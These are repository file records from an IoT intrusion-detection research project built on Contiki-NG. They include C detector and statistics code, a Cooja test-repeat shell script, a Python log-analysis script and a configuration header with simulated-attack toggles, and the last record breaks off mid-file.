{\n // nodes[j].counterDetect[k]=0;\n nodes[j].fromNode[k].u8[sizeof(nodes[j].fromNode[k].u8) - 1] = 0;\n }\n }\n\n nodes[j].detected = 1;\n LOG_INFO(\"warning!ID mal %u!\\n\", (unsigned)nodes[j].address);\n // nodes[j].address=0;\n nodes[j].counterDIS = 0;\n nodes[j].counterMsg = 0;\n nodes[j].intervals = 999;\n }\n\n } else\n nodes[j].detected = 0;\n }\n\n //ctimer_reset(&mytimer);\n}\n\n#endif\n\n// #if IDS_SERVER || IDS_CLIENT\n\n// static void\n// callback_nbr_entry_removal(uip_ds6_nbr_entry_t *nbr_entry)\n// {\n// uip_ds6_nbr_t *nbr;\n// uip_ds6_nbr_t *next_nbr;\n// if(nbr_entry == NULL) {\n// return;\n// }\n// for(nbr = (uip_ds6_nbr_t *)list_head(nbr_entry->uip_ds6_nbrs);\n// nbr != NULL;\n// nbr = next_nbr) {\n// next_nbr = (uip_ds6_nbr_t *)list_item_next(nbr);\n// free_uip_ds6_nbr(nbr);\n// }\n// }\n\n// #endif /* UIP_DS6_NBR_MULTI_IPV6_ADDRS */\n// PROCESS_THREAD(ids_process, ev, data)\n// {\n\n// static struct etimer mytimer;\n\n// PROCESS_BEGIN();\n\n// uint8_t i=0;\n// for (i=0;i<NODES_NUM;i++){\n// nodes[i].address=0;\n// }\n\n// // if(period == NULL) {\n// // PROCESS_EXIT();\n// //}\n\n// while(1) {\n// etimer_set(&mytimer, 5*CLOCK_SECOND);\n// PROCESS_WAIT_EVENT_UNTIL(etimer_expired(&mytimer));\n// //etimer_reset(&mytimer);\n// checkNodes();\n// //PROCESS_WAIT_UNTIL(etimer_expired(&periodic));\n// //checkNodes();\n// }\n\n// PROCESS_END();\n// }"
},
{
"alpha_fraction": 0.5965714454650879,
"alphanum_fraction": 0.6102856993675232,
"avg_line_length": 18.44444465637207,
"blob_id": "3b43a0392b2931ead896f5d662d0ad6d69605eaf",
"content_id": "c6f48a57cbd3dfad8e3dbf61359cebce3e6777a9",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 875,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 45,
"path": "/tools/cooja/Testing/RUN_REPEATED.sh",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# Usage\nif [ $# -eq 2 ]; then\n REPEATS=$1\n TEST=$2\nelse\n echo \"Usage: $0 <nr_repeats> <test>\"\n echo \"Example: $0 10 cooja_helloworld\"\n exit 1\nfi\n\n# Locate Contiki/COOJA\nif [ -z \"$CONTIKI\" ]; then\n if [ -z \"$CONTIKI_HOME\" ]; then\n \tCONTIKI_HOME=../../..\n fi\n CONTIKI=$CONTIKI_HOME\nfi\n\n# Clean up\nrm -f *.cooja_log\nrm -fr se obj_cooja\nrm -f symbols.c symbols.h\n\n# Compile COOJA\necho \">>>>>>> Building COOJA <<<<<<<<\"\n(cd $CONTIKI/tools/cooja && ant clean && ant jar)\nif [ \"$?\" != \"0\" ]; then\n echo \"Compilation of COOJA failed\"\n exit 1\nfi\n\n# Run tests\nfor COUNTER in `seq 1 $REPEATS`;\ndo\n echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST-$COUNTER.log <<<<<<<<\"\n bash RUN_TEST.sh $TEST RUN_REPEATED_LAST.log\n mv $TEST.log $TEST-$COUNTER.log\ndone\n\necho\ncat RUN_REPEATED_LAST.log\necho\necho \">>>>>>> DONE! Test logs stored in $TEST-[1-$REPEATS].log <<<<<<<<\"\n"
},
{
"alpha_fraction": 0.4541984796524048,
"alphanum_fraction": 0.4893675148487091,
"avg_line_length": 20.710060119628906,
"blob_id": "80c416598d29d1ee8b3208b7a2c2e3a5388ad95b",
"content_id": "313bb3b1f40d600794303aa74539359d9bc77ccc",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3668,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 169,
"path": "/tools/cooja/Testing/clone_test/readDetector.py",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "import datetime\n\ndef readFiles():\n\t\n\tsumavg=[]\n\tkk=1\n\tfor kk in range(1,11):\n\n\t\twith open(\"result\"+str(kk)+\".txt\",\"w\") as f1:\n\n\t\t\tmal=0\n\t\t\t#for u in range(1,4):\n\t\t\t\t\n\t\t\tmals=[]\n\t\t\tcounters=[]\n\t\t\tcount=0\n\t\t\ttot=0\n\t\t\tavg=[]\n\t\t\t\n\t\t\t#for each run\n\t\t\tfor i in range(1,6):\n\t\t\t\tfile1=\"read_IDS_allnodes_sciptIDS\"+str(kk)+\"-clone-\"+str(i)+\".log\"\n\t\t\t\tcount=0\n\t\t\t\tmals=[]\n\t\t\t\tcounters=[]\n\t\t\t\ttot=0\n\t\t\t\tfp1=[]\n\t\t\t\tsure_nodes={}\n\t\t\t\tcount_sure=0\n\t\t\t\tcount_time=0\n\t\t\t\tclone={}\n\n\t\t\t\twith open(file1,\"r\") as f:\n\t\t\t\t\tfor line in f:\n\t\t\t\t\t\t#if (line.find(\"ID malicious\")!=-1):\n\t\t\t\t\t\t\t#print (line)\n\t\t\t\t\t\tif (line.find(\"attacker\")!=-1):\n\t\t\t\t\t\t\tx1=line.split()\n\t\t\t\t\t\t\tnode=int(x1[6].split(\":\")[1])\n\t\t\t\t\t\t\tif (node not in clone):\n\t\t\t\t\t\t\t\tclone[node]=1\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tclone[node]=clone[node]+1\n\t\t\t\t\t\tif (line.find(\"chkns\")!=-1):\n\t\t\t\t\t\t\t#print(line)\n\t\t\t\t\t\t\tx1=line.split()\n\t\t\t\t\t\t\tif \"IPde\" in x1[5]:\n\t\t\t\t\t\t\t\tnode=int(x1[9].split(\":\")[1])\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tnode=int(x1[5].split(\":\")[1])\n\t\t\t\t\t\t\t# if (file1==\"read_IDS_allnodes_scipt52-3.log\" and node==6):\n\t\t\t\t\t\t\t# \tprint(line,node)\n\t\t\t\t\t\t\t#fp1.append(node)\n\t\t\t\t\t\tif (line.find(\"Maybe\")!=-1):\t\n\t\t\t\t\t\t\tx1=line.split()\n\t\t\t\t\t\t\tnode=int(x1[6].split(\":\")[1])\n\t\t\t\t\t\t\t# print(x1[0])\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t# exit(0)\n\t\t\t\t\t\t\tfor i in range(0,len(fp1)):\n\t\t\t\t\t\t\t\t#if file1.find(\"testwith4mals\")!=-1:\n\t\t\t\t\t\t\t\t#\tprint (i,mals[i],node,counters[i])\n\t\t\t\t\t\t\t\t\t#print (line)\n\t\t\t\t\t\t\t\tif fp1[i]==node:\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t#print(\"added:\",node,count,mals)\n\t\t\t\t\t\t\t\t# print(x1,node)\n\t\t\t\t\t\t\t\tfp1.append(int(node))\n\t\t\t\t\t\t\t\t#mal=node\n\t\t\t\t\t\tif (line.find(\"warning\")!=-1):\n\t\t\t\t\t\t\ttot+=1\n\t\t\t\t\t\t\tx=line.split()\n\t\t\t\t\t\t\t# print(x)\n\t\t\t\t\t\t\t#print (x)\n\t\t\t\t\t\t\tnode=int(x[7].split(\"!\")[0])\n\t\t\t\t\t\t\t#print (node)\n\t\t\t\t\t\t\tfor i in range(0,len(mals)):\n\t\t\t\t\t\t\t\t#if file1.find(\"testwith4mals\")!=-1:\n\t\t\t\t\t\t\t\t#\tprint (i,mals[i],node,counters[i])\n\t\t\t\t\t\t\t\t\t#print (line)\n\t\t\t\t\t\t\t\tif mals[i]==node:\n\t\t\t\t\t\t\t\t\tcounters[i]+=1\n\t\t\t\t\t\t\t\t\t#print (mals)\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t#print(\"added:\",node,count,mals)\n\t\t\t\t\t\t\t\tmals.append(int(node))\n\t\t\t\t\t\t\t\tcount+=1\n\t\t\t\t\t\t\t\tcounters.append(count)\n\t\t\t\t\t\t\t\tcount=0\n\t\t\t\t\t\t\t\t#mal=node\n\n\t\t\t\t\t\tif (line.find(\"sure mal\")!=-1):\n\t\t\t\t\t\t\tx=line.split()\n\t\t\t\t\t\t\t# print(x)\n\t\t\t\t\t\t\t# exit(0)\n\t\t\t\t\t\t\tnode=int(x[8].split(\"!\")[0])\n\t\t\t\t\t\t\tsec=(int(x[0])/(1000000.0))\n\t\t\t\t\t\t\tminutes=(int(x[0])/(1000000.0*60))%60.0\n\t\t\t\t\t\t\tminutes = float(minutes)\n\t\t\t\t\t\t\tprint(x,sec,minutes)\n\t\t\t\t\t\t\ta=str(datetime.timedelta(seconds=sec))\n\t\t\t\t\t\t\tprint(a)\n\t\t\t\t\t\t\tif minutes:\n\t\t\t\t\t\t\t\tcount_time+=1\n\t\t\t\t\t\t\tsure_nodes[node]=node\n\t\t\t\t\t\t\tcount_sure+=1\n\n\t\t\t\t\t\tif line.find(\"Test ended\")!=-1:\n\t\t\t\t\t\t\tprint(\"DONE GOOD\",line)\n\n\t\t\t\n\t\t\t\tprint (\"*\"*30,\"\\n\",file1,tot)\n\t\t\t\tf1.write(\"\\nFile:\"+file1+\"\\n\")\n\t\t\t\ta=0\n\t\t\t\tprint(\"final:\",count_time)\n\t\t\t\t\n\t\t\t\tf1.write(\"SURE NODES:\")\n\t\t\t\tfor x,y in sure_nodes.items():\n\t\t\t\t\tf1.write(str(x))\n\t\t\t\t\tf1.write(\", \")\n\t\t\t\tf1.write(\"\\n\")\n\t\t\t\tf1.write(\"sure count:%s\\n\" % str(count_sure))\n\n\t\t\t\tfor x,y in clone.items():\n\t\t\t\t\tf1.write(\"Clone nodes:\"+ str(x)+\" count:\"+str(y)+\"\\n\")\n\t\t\t\tf1.write(\"\\n\")\n\n\n\t\t\t\tfor x in mals:\n\t\t\t\t\tprint (\" malicious:\",x,\"Count:\",(counters[a]))\n\t\t\t\t\tf1.write(\"Malicious id:\")\n\t\t\t\t\tf1.write(str(x))\n\t\t\t\t\tf1.write(\" \"+str(counters[a])+\"\\n\")\n\t\t\t\t\ta+=1\n\t\t\t\tavg.append(float(tot))\n\n\t\t\t\tfor f in fp1:\n\t\t\t\t\tf1.write(\"FP id:\")\n\t\t\t\t\tf1.write(str(f))\n\t\t\t\t\tf1.write(\"\\n\")\n\n\t\t\t\t\n\t\t\t#Average for 10 repetitions\n\t\t\t#print(\"len\",len(avg),avg)\n\t\t\tsumavg.append(sum(avg)/len(avg))\n\t\t\t#print (len(sumavg),sumavg)\n\t\t\tc=0\n\t\t\tfor i in avg:\n\t\t\t\t#print (i)\n\t\t\t\tc+=1\n\t\t\t\tf1.write(\"Total in \"+str(c)+\": \"+str(i)+\"\\n\")\n\t\t\n\t\t\tc=0\n\t\t\tfor k in sumavg:\n\t\t\t\t#print (i)\n\t\t\t\tc+=1\n\t\t\t\tf1.write(\"AVG \"+str(c)+\": \"+str(k)+\"\\n\")\n\n\n\n\n\n\n\n\nreadFiles()"
},
{
"alpha_fraction": 0.5969935655593872,
"alphanum_fraction": 0.6102362275123596,
"avg_line_length": 24.642202377319336,
"blob_id": "f10fead2a1cbfb93720fb196edd91bc14cf38a4a",
"content_id": "29fb36861e836cbcdb8b98d5a4eedadc5ba3ce2b",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 2794,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 109,
"path": "/examples/rpl-udp/project-conf.h",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#ifndef IDS_CLIENT\n#define IDS_CLIENT 0\n#pragma message \"undefined ids client\"\n#endif\n\n#ifndef IDS_SERVER\n#define IDS_SERVER 0\n#pragma message \"undefined ids server\"\n#endif\n\n#ifndef RPL_SERVER\n#define RPL_SERVER 0\n#endif\n\n#ifndef MALICIOUS\n#define MALICIOUS 0\n#endif\n\n#ifndef MAL_RANK\n#define MAL_RANK 0\n#endif\n\n#ifndef MAL_DIS\n#define MAL_DIS 0\n#endif\n\n#ifndef MAL_EXT\n#define MAL_EXT 0\n#endif\n\n#ifndef MAL_BLACKHOLE\n#define MAL_BLACKHOLE 0\n#endif\n\n#ifndef CLONE_ATTACK\n#define CLONE_ATTACK 0\n#endif\n\n#ifndef IDS_OF\n#define IDS_OF 0\n#endif\n\n\n\n#ifdef DEBUG\n#undef DEBUG\n#define DEBUG 1\n#endif\n\n// #undef LOG_CONF_LEVEL_RPL\n// #undef LOG_CONF_LEVEL_6LOWPAN\n// #define LOG_CONF_LEVEL_RPL LOG_LEVEL_DBG\n// #define LOG_CONF_LEVEL_IPV6 LOG_LEVEL_WARN\n// #define LOG_CONF_LEVEL_6LOWPAN LOG_LEVEL_NONE\n// #define LOG_CONF_LEVEL_TCPIP LOG_LEVEL_NONE\n// #define LOG_CONF_LEVEL_MAC LOG_LEVEL_DBG\n// #define LOG_CONF_LEVEL_MAIN LOG_LEVEL_INFO\n// #define LOG_CONF_LEVEL_IDS LOG_LEVEL_INFO\n\n#define LOG_CONF_LEVEL_IPV6 LOG_LEVEL_DBG\n#define LOG_CONF_LEVEL_RPL LOG_LEVEL_DBG\n#define LOG_CONF_LEVEL_6LOWPAN LOG_LEVEL_NONE\n#define LOG_CONF_LEVEL_TCPIP LOG_LEVEL_NONE\n#define LOG_CONF_LEVEL_MAC LOG_LEVEL_INFO\n#define LOG_CONF_LEVEL_FRAMER LOG_LEVEL_NONE\n#define LOG_CONF_LEVEL_COAP LOG_LEVEL_NONE\n#define LOG_CONF_LEVEL_LWM2M LOG_LEVEL_NONE\n#define LOG_CONF_LEVEL_6TOP LOG_LEVEL_NONE\n#define LOG_CONF_LEVEL_MAIN LOG_LEVEL_INFO\n\n#if IDS_OF || IDS_CLIENT\n/* configure network size and density */\n#undef NETSTACK_MAX_ROUTE_ENTRIES\n#define UIP_CONF_MAX_ROUTES 15\n#define NETSTACK_MAX_ROUTE_ENTRIES 15\n\n#undef NBR_TABLE_CONF_MAX_NEIGHBORS\n#define NBR_TABLE_CONF_MAX_NEIGHBORS 15\n#endif /* NETSTACK_MAX_ROUTE_ENTRIES */\n\n\n\n//------My IDS conf--------\n\n// #if !IDS_SERVER\n// #undef NETSTACK_CONF_MAC\n// // #ifndef NETSTACK_CONF_MAC\n// #define NETSTACK_CONF_MAC\tcsma_driver //csma_driver nullmac_driver\n// // #endif\n// #endif\n\n//#ifdef IDS_CLIENT\n//#undef CC2420_CONF_AUTOACK\n//#define CC2420_CONF_AUTOACK 0\n//#endif\n\n// #endif\n// #ifdef RADIO_RX_MODE_ADDRESS_FILTER\n// #undef RADIO_RX_MODE_ADDRESS_FILTER\n// #define RADIO_RX_MODE_ADDRESS_FILTER (0 << 0)\n// #endif\n// #endif\n\n// #ifdef IDS_SERVER\n// #undef NBR_TABLE_CONF_MAX_NEIGHBORS\n// #define NBR_TABLE_CONF_MAX_NEIGHBORS 7\n// #undef UIP_CONF_MAX_ROUTES\n// #define UIP_CONF_MAX_ROUTES 7\n// #endif"
},
{
"alpha_fraction": 0.5812612175941467,
"alphanum_fraction": 0.5993634462356567,
"avg_line_length": 32.28807830810547,
"blob_id": "2bc2d89d37ba4325a922cbe1ae896f8529034f74",
"content_id": "0455bf0e6761fa369fcb596c984b4efae6819d59",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 10054,
"license_type": "permissive",
"max_line_length": 125,
"num_lines": 302,
"path": "/arch/platform/whitefield/command.c",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#define\t_COMMAND_C_\n\n#include \"command.h\"\n//#include \"udp-app.h\"\n#include \"rpl-dag-root.h\"\n#define DEBUG DEBUG_PRINT\n#include \"os/net/ipv6/uip-debug.h\"\n\nextern int gNodeID;\n\n#define NOT_IMPLEMENTED return snprintf(buf, buflen, \"NOT IMPLEMENTED\")\n\n//PROCESS_NAME(udp_client_process);\nint cmd_start_udp(uint16_t id, char *buf, int buflen)\n{\n NOT_IMPLEMENTED;\n#if 0\n /* Just stsrt the periodic timer to send UDP traffic */\n int n=0;\n //process_start(&udp_client_process, NULL);\n start_udp_process();\n ADD2BUF(NULL, \"UDP Client Sucess\");\n return n;\n#endif\n}\n\n/*\nappstat->totalpktsent = seq_id;\n appstat->totalpktrecvd = g_pktstat.rcvcnt;\n appstat->totalduppkt = g_pktstat.dupcnt;\n appstat->minroudtriptime = g_pktstat.leastLatency;\n appstat->maxroundtriptime = g_pktstat.maxLatency;\n\n*/\nint cmd_get_udpapp_stat(uint16_t id, char *buf, int buflen)\n{\n NOT_IMPLEMENTED;\n#if 0\n udpapp_stat_t appstat;\n int n = 0;\n\n int isroot = rpl_dag_root_is_root();\n\n udp_get_app_stat(&appstat);\n if (isroot){\n ADD2BUF(NULL, \"\\t\\\"Total PKT Sent 2 BR\\\": \\\"%u\\\",\\n\", appstat.totalpktsent);\n ADD2BUF(NULL, \"\\t\\\"Total PKT Recvd by BR\\\": \\\"%u\\\",\\n\", appstat.totalpktrecvd);\n ADD2BUF(NULL, \"\\t\\\"Total PKT Dropped\\\": \\\"%u\\\",\\n\", (appstat.totalpktsent - appstat.totalpktrecvd));\n ADD2BUF(NULL, \"\\t\\\"Total Dup PKT RCVD by BR\\\": \\\"%u\\\",\\n\", appstat.totalduppkt);\n if (appstat.totalpktrecvd){\n ADD2BUF(NULL, \"\\t\\\"PDR for upward direction\\\": \\\"%.2f\\\",\\n\", (float)appstat.totalpktrecvd/(float)appstat.totalpktsent);\n }\n }\n else{\n ADD2BUF(NULL, \"\\t\\\"Node:\\\" \\\"%d\\\",\\n\",gNodeID);\n ADD2BUF(NULL, \"\\t\\\"Total REQ Sent\\\": \\\"%u\\\",\\n\", appstat.totalpktsent);\n\n ADD2BUF(NULL, \"\\t\\\"Total RSP Recvd\\\": \\\"%u\\\",\\n\", appstat.totalpktrecvd);\n ADD2BUF(NULL, \"\\t\\\"Total RSP Dropped\\\": \\\"%u\\\",\\n\", (appstat.totalpktsent - appstat.totalpktrecvd));\n ADD2BUF(NULL, \"\\t\\\"Total Dup RSP RCVD\\\": \\\"%u\\\",\\n\", appstat.totalduppkt);\n if (appstat.totalpktrecvd){\n ADD2BUF(NULL, \"\\t\\\"PDR for upward direction\\\": \\\"%.2f\\\",\\n\", (float)appstat.totalpktrecvd/(float)appstat.totalpktsent);\n }\n ADD2BUF(NULL, \"\\t\\\"Least E2E Latency\\\": \\\"%lu\\\",\\n\", appstat.minroudtriptime);\n ADD2BUF(NULL, \"\\t\\\"MAX E2E Latency\\\": \\\"%lu\\\",\\n\", appstat.maxroundtriptime);\n }\n return n;\n#endif\n}\n\n\nint uip_ipaddr_to_str(const uip_ipaddr_t *addr, char *buf, int buflen)\n{\n#if NETSTACK_CONF_WITH_IPV6\n\tuint16_t a;\n\tunsigned int i;\n\tint f, n =0;\n#endif /* NETSTACK_CONF_WITH_IPV6 */\n\tif(addr == NULL) {\n\t\treturn snprintf(buf, buflen, \"[NONE]\");\n\t}\n#if NETSTACK_CONF_WITH_IPV6\n\tfor(i = 0, f = 0; i < sizeof(uip_ipaddr_t); i += 2) {\n\t\ta = (addr->u8[i] << 8) + addr->u8[i + 1];\n\t\tif(a == 0 && f >= 0) {\n\t\t\tif(f++ == 0) {\n\t\t\t\tn += snprintf(buf+n, buflen-n, \"::\");\n\t\t\t}\n\t\t} else {\n\t\t\tif(f > 0) {\n\t\t\t\tf = -1;\n\t\t\t} else if(i > 0) {\n\t\t\t\tn += snprintf(buf+n, buflen-n, \":\");\n\t\t\t}\n\t\t\tn += snprintf(buf+n, buflen-n,\"%x\", a);\n\t\t}\n\t}\n\treturn n;\n#else /* NETSTACK_CONF_WITH_IPV6 */\n\treturn snprintf(buf, buflen, \"%u.%u.%u.%u\",\n\t\t\taddr->u8[0], addr->u8[1], addr->u8[2], addr->u8[3]);\n#endif /* NETSTACK_CONF_WITH_IPV6 */\n}\n\nint cmd_def_route(uint16_t id, char *buf, int buflen)\n{\n const uip_ipaddr_t *ipaddr = uip_ds6_defrt_choose();\n if (!ipaddr) {\n return snprintf(buf, buflen, \"NO_DEF_ROUTE\");\n }\n\treturn uip_ipaddr_to_str(ipaddr, buf, buflen);\n}\n\nint cmd_rpl_stats(uint16_t id, char *buf, int buflen)\n{\n NOT_IMPLEMENTED;\n#if 0\n\tint n=0;\n\t//LOCK();\n\tADD2BUF(NULL, \"{ \\\"rpl_stats\\\": {\\n\");\n\tADD2BUF(NULL, \"\\t\\\"mem_ovrflw\\\": \\\"%d\\\",\\n\", rpl_stats.mem_overflows);\n\tADD2BUF(NULL, \"\\t\\\"local_repairs\\\": \\\"%d\\\",\\n\", rpl_stats.local_repairs);\n\tADD2BUF(NULL, \"\\t\\\"global_repairs\\\": \\\"%d\\\",\\n\", rpl_stats.global_repairs);\n\tADD2BUF(NULL, \"\\t\\\"malformed_msgs\\\": \\\"%d\\\",\\n\", rpl_stats.malformed_msgs);\n\tADD2BUF(NULL, \"\\t\\\"resets\\\": \\\"%d\\\",\\n\", rpl_stats.resets);\n\tADD2BUF(NULL, \"\\t\\\"parent_switch\\\": \\\"%d\\\",\\n\", rpl_stats.parent_switch);\n\tADD2BUF(NULL, \"\\t\\\"fwd_errors\\\": \\\"%d\\\",\\n\", rpl_stats.forward_errors);\n\tADD2BUF(NULL, \"\\t\\\"loop_errors\\\": \\\"%d\\\",\\n\", rpl_stats.loop_errors);\n\tADD2BUF(NULL, \"\\t\\\"loop_warns\\\": \\\"%d\\\",\\n\", rpl_stats.loop_warnings);\n\tADD2BUF(NULL, \"\\t\\\"root_repairs\\\": \\\"%d\\\",\\n\", rpl_stats.root_repairs);\n\tADD2BUF(NULL, \"\\t\\\"dio_sent_mcast\\\": \\\"%d\\\",\\n\", rpl_stats.dio_sent_m);\n\tADD2BUF(NULL, \"\\t\\\"dio_sent_ucast\\\": \\\"%d\\\",\\n\", rpl_stats.dio_sent_u);\n\tADD2BUF(NULL, \"\\t\\\"dio_rcvd\\\": \\\"%d\\\",\\n\", rpl_stats.dio_recvd);\n\tADD2BUF(NULL, \"\\t\\\"dao_sent\\\": \\\"%d\\\",\\n\", rpl_stats.dao_sent);\n\tADD2BUF(NULL, \"\\t\\\"dao_rcvd\\\": \\\"%d\\\",\\n\", rpl_stats.dao_recvd);\n\tADD2BUF(NULL, \"\\t\\\"dao_fwded\\\": \\\"%d\\\",\\n\", rpl_stats.dao_forwarded);\n\tADD2BUF(NULL, \"\\t\\\"npdao_sent\\\": \\\"%d\\\",\\n\", rpl_stats.npdao_sent);\n\tADD2BUF(NULL, \"\\t\\\"npdao_rcvd\\\": \\\"%d\\\",\\n\", rpl_stats.npdao_recvd);\n\tADD2BUF(NULL, \"\\t\\\"npdao_fwded\\\": \\\"%d\\\",\\n\", rpl_stats.npdao_forwarded);\n\tADD2BUF(NULL, \"\\t\\\"dco_sent\\\": \\\"%d\\\",\\n\", rpl_stats.dco_sent);\n\tADD2BUF(NULL, \"\\t\\\"dco_rcvd\\\": \\\"%d\\\",\\n\", rpl_stats.dco_recvd);\n\tADD2BUF(NULL, \"\\t\\\"dco_fwded\\\": \\\"%d\\\",\\n\", rpl_stats.dco_forwarded);\n\tADD2BUF(NULL, \"\\t\\\"dco_ign\\\": \\\"%d\\\"\\n\", rpl_stats.dco_ignored);\n\tADD2BUF(NULL, \"}\\n}\");\n#if 0\n\tn = snprintf(buf, buflen, \"mem_ovrflw=%d,loc_rep=%d,glo_rep=%d,\"\n\t\t\t\"malformed_msgs=%d,resets=%d,prnt_sw=%d,\"\n\t\t\t\"fwd_err=%d,loop_err=%d,loop_warn=%d,root_rep=%d\",\n\t\t\trpl_stats.mem_overflows, rpl_stats.local_repairs, rpl_stats.global_repairs,\n\t\t\trpl_stats.malformed_msgs, rpl_stats.resets, rpl_stats.parent_switch,\n\t\t\trpl_stats.forward_errors, rpl_stats.loop_errors, rpl_stats.loop_warnings, rpl_stats.root_repairs);\n#endif\n\t//UNLOCK();\n\treturn n;\n#endif\n}\n\nint cmd_node_osname(uint16_t id, char *buf, int buflen)\n{\n\tint n=0;\n\tADD2BUF(NULL, \"{\\\"os\\\": \\\"contiki-ng\\\"}\");\n\treturn n;\n}\n\nint cmd_ipv6_stats(uint16_t id, char *buf, int buflen)\n{\n NOT_IMPLEMENTED;\n#if 0\n\tint n=0;\n\t//LOCK();\n\tADD2BUF(NULL, \"{ \\\"ipv6_stats\\\": {\\n\");\n\tADD2BUF(NULL, \"\\t\\\"rcvd\\\": \\\"%d\\\",\\n\", uip_stat.ip.recv);\n\tADD2BUF(NULL, \"\\t\\\"sent\\\": \\\"%d\\\",\\n\", uip_stat.ip.sent);\n\tADD2BUF(NULL, \"\\t\\\"fwded\\\": \\\"%d\\\",\\n\", uip_stat.ip.forwarded);\n\tADD2BUF(NULL, \"\\t\\\"drop\\\": \\\"%d\\\",\\n\", uip_stat.ip.drop);\n\tADD2BUF(NULL, \"\\t\\\"drop\\\": \\\"%d\\\",\\n\", uip_stat.ip.drop);\n\tADD2BUF(NULL, \"\\t\\\"ver_len_err\\\": \\\"%d\\\",\\n\",\n\t\tuip_stat.ip.vhlerr + uip_stat.ip.hblenerr + uip_stat.ip.lblenerr);\n\tADD2BUF(NULL, \"\\t\\\"fragerr\\\": \\\"%d\\\",\\n\", uip_stat.ip.fragerr);\n\tADD2BUF(NULL, \"\\t\\\"chkerr\\\": \\\"%d\\\",\\n\", uip_stat.ip.chkerr);\n\tADD2BUF(NULL, \"\\t\\\"protoerr\\\": \\\"%d\\\"\\n\", uip_stat.ip.protoerr);\n\tADD2BUF(NULL, \"}\\n}\");\n#if 0\n\tn = snprintf(buf, buflen, \"ipv6 rcv=%d,sent=%d,fwded=%d,drop=%d,\"\n\t\t\t\"ver_len_err=%d,\"\n\t\t\t\"fragerr=%d,chkerr=%d,protoerr=%d\",\n\t\t\tuip_stat.ip.recv, uip_stat.ip.sent, uip_stat.ip.forwarded, uip_stat.ip.drop,\n\t\t\t(uip_stat.ip.vhlerr + uip_stat.ip.hblenerr + uip_stat.ip.lblenerr),\n\t\t\tuip_stat.ip.fragerr, uip_stat.ip.chkerr, uip_stat.ip.protoerr);\n\t//UNLOCK();\n#endif\n\treturn n;\n#endif\n}\n\nint cmd_icmp_stats(uint16_t id, char *buf, int buflen)\n{\n NOT_IMPLEMENTED;\n#if 0\n\tint n=0;\n\tADD2BUF(NULL, \"{ \\\"icmp_stats\\\": {\\n\");\n\tADD2BUF(NULL, \"\\t\\\"rcvd\\\": \\\"%d\\\",\\n\", uip_stat.icmp.recv);\n\tADD2BUF(NULL, \"\\t\\\"sent\\\": \\\"%d\\\",\\n\", uip_stat.icmp.sent);\n\tADD2BUF(NULL, \"\\t\\\"drop\\\": \\\"%d\\\",\\n\", uip_stat.icmp.drop);\n\tADD2BUF(NULL, \"\\t\\\"typeerr\\\": \\\"%d\\\",\\n\", uip_stat.icmp.typeerr);\n\tADD2BUF(NULL, \"\\t\\\"chkerr\\\": \\\"%d\\\"\\n\", uip_stat.icmp.chkerr);\n\tADD2BUF(NULL, \"}\\n}\");\n#if 0\n\tn = snprintf(buf, buflen, \"icmpv6 rcv=%d,sent=%d,drop=%d,typeerr=%d,chkerr=%d\",\n\t\t\tuip_stat.icmp.recv, uip_stat.icmp.sent, uip_stat.icmp.drop,\n\t\t\tuip_stat.icmp.typeerr, uip_stat.icmp.chkerr);\n#endif\n\treturn n;\n#endif\n}\n\nint cmd_udp_stats(uint16_t id, char *buf, int buflen)\n{\n#if 0//UIP_CONF_UDP\n\tint n=0;\n\tADD2BUF(NULL, \"{ \\\"udp_stats\\\": {\\n\");\n\tADD2BUF(NULL, \"\\t\\\"rcvd\\\": \\\"%d\\\",\\n\", uip_stat.udp.recv);\n\tADD2BUF(NULL, \"\\t\\\"sent\\\": \\\"%d\\\",\\n\", uip_stat.udp.sent);\n\tADD2BUF(NULL, \"\\t\\\"drop\\\": \\\"%d\\\",\\n\", uip_stat.udp.drop);\n\tADD2BUF(NULL, \"\\t\\\"chkerr\\\": \\\"%d\\\"\\n\", uip_stat.udp.chkerr);\n\tADD2BUF(NULL, \"}\\n}\");\n\treturn n;\n#else\n\treturn snprintf(buf, buflen, \"UDP_NOT_ENABLED\");\n#endif\n}\n\nint cmd_tcp_stats(uint16_t id, char *buf, int buflen)\n{\n#if 0//UIP_CONF_TCP\n\tint n=0;\n\tADD2BUF(NULL, \"{ \\\"tcp_stats\\\": {\\n\");\n\tADD2BUF(NULL, \"\\t\\\"rcvd\\\": \\\"%d\\\",\\n\", uip_stat.tcp.recv);\n\tADD2BUF(NULL, \"\\t\\\"sent\\\": \\\"%d\\\",\\n\", uip_stat.tcp.sent);\n\tADD2BUF(NULL, \"\\t\\\"drop\\\": \\\"%d\\\",\\n\", uip_stat.tcp.drop);\n\tADD2BUF(NULL, \"\\t\\\"chkerr\\\": \\\"%d\\\",\\n\", uip_stat.tcp.chkerr);\n\tADD2BUF(NULL, \"\\t\\\"ackerr\\\": \\\"%d\\\",\\n\", uip_stat.tcp.ackerr);\n\tADD2BUF(NULL, \"\\t\\\"rst\\\": \\\"%d\\\",\\n\", uip_stat.tcp.rst);\n\tADD2BUF(NULL, \"\\t\\\"rexmit\\\": \\\"%d\\\",\\n\", uip_stat.tcp.rexmit);\n\tADD2BUF(NULL, \"\\t\\\"syndrop\\\": \\\"%d\\\",\\n\", 